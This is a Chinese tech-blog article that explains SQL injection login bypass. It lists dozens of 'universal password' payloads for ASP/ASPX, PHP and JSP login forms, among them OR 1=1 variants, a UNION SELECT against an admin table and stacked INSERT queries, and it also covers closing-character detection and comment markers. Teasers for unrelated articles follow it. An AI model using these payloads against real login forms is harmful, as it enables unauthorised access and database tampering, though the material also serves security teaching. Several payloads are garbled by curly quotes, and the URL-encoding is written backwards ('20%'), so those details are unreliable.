news 2026/9/7 23:51:05

sql注入万能密码及闭合符的判断

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
sql注入万能密码及闭合符的判断

SQL注入原理

用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。
用户登录时,后台执行的数据库查询操作(SQL语句)是:

Select user_id,user_type,email From users Where user_id='用户名' And password='密码'

万能密码通常是一个可以代替正确密码的字符串,使得SQL注入语句能够成功执行,从而绕过正常的身份验证流程。

  1. ' OR '1'='1:这是一个在SQL注入中使用的典型的万能密码,它通过使得条件始终为真(即'1'='1'),使得原本的查询语句无需正确的用户名和密码即可成功执行。

  2. '; INSERT INTO ...:在一些情况下,攻击者可以通过在原本的SQL语句中添加额外的SQL命令,如插入新记录。

  3. --:这是一个用于注释掉SQL语句的符号,后续的所有内容都会被视为注释

  4. ') OR '1'='1:这是另一种在WHERE子句中使用的万能密码,它通过构造一个始终为真的条件,使得查询可以返回所有的记录。

asp aspx万能密码


1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17:admin’ or ‘a’=’a 密码随便

PHP万能密码


‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1

jsp 万能密码


1’or’1’=’1
admin’ OR 1=1/*

sql闭合符判断

  • 闭合符的定义和用途

在SQL语句中,闭合符用于闭合字符串或括号,确保SQL语句的语法正确。例如,在SQL查询语句中,单引号和双引号用于包围字符串值,而括号用于包围函数或条件表达式。当进行SQL注入时,攻击者会利用这些闭合符来构造恶意的SQL语句,从而绕过应用程序的输入验证,执行未授权的数据库操作。

  • 常见的闭合符类型

  1. 单引号‌:在SQL语句中,单引号用于包围字符串值。例如:SELECT * FROM users WHERE username = 'admin'。在SQL注入中,攻击者可以通过添加额外的单引号来闭合原有的单引号,从而构造出恶意的SQL语句。

  2. 双引号‌:在某些数据库系统中,双引号也可以用于包围字符串值。例如:SELECT * FROM users WHERE username = "admin"。在SQL注入中,攻击者可以通过添加额外的双引号来闭合原有的双引号。

  3. 括号‌:括号用于包围函数或条件表达式。例如:SELECT * FROM users WHERE username = 'admin' AND (1=1)。在SQL注入中,攻击者可以通过添加额外的括号来闭合原有的括号。

SQL注入中的注释符

1.#, -- (空格),--+都是sql里的注释符,可以使它们后面的语句不被执行。

2.url中, (空格)转换为20%

#转换为23%

#

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/7 23:48:15

6脉波HVDC输电系统MATLAB仿真与DeepSeek文档翻译实战解析

这几天有个研究生学弟拿着一份MATLAB自带的帮助文档来找我,说想搞明白“Simple 6-Pulse HVDC Transmission System”这个官方示例,但文档一水的英文,专业术语密密麻麻,打开两页就头大了。我当时的建议很直接:先把文档扔…

作者头像 李华
网站建设 2026/9/7 23:47:34

机器学习实战:从数据清洗到模型评估的完整案例精解

简介:《机器学习实战案例精解》是一本面向数据科学家与技术初学者的机器学习实战电子书,以五个真实案例为主线,系统讲解统计与概率、回归、时间序列、聚类与分类等核心方法,适合希望通过完整案例掌握机器学习流程的读者。书中每个…

作者头像 李华
网站建设 2026/9/7 23:46:50

2026语音芯片口碑全解析:选型判断维度、常见方案盘点与适用场景详解,附核心避坑FAQ

一、2026年语音芯片认知现状与核心需求当前处于语音芯片选型决策的熟悉阶段,多数从业者已完成“有需求”的初步认知,核心困惑集中在「选什么类型的方案」「怎么判断产品口碑」「适配自身场景的核心要求是什么」。据《2026中国语音芯片行业应用白皮书》数…

作者头像 李华
网站建设 2026/9/7 23:46:46

Android进程与线程:从源码到保活实践的全链路排查手册

上个月有个做社交产品的朋友找我,说他们在 oppo 手机上后台被杀得特别惨,推送收不到,音乐播放器也经常断。他想了一堆“黑科技”想去保活,问我行不行。我跟他讲,你先别急着上那些骚操作,你先把 Android 的进…

作者头像 李华
网站建设 2026/9/7 23:46:29

BST最近K值:从全量遍历到双栈导航的算法优化

最近在复盘一道老题:Closest K Values in BST。我必须说,这道题给我留下的印象比很多 hard 题都深。原因不是它难,而是它让我重新审视了一个很常见的思维惯性——刷算法题刷久了,人很容易把“解决问题”等同于“遍历所有可能”。B…

作者头像 李华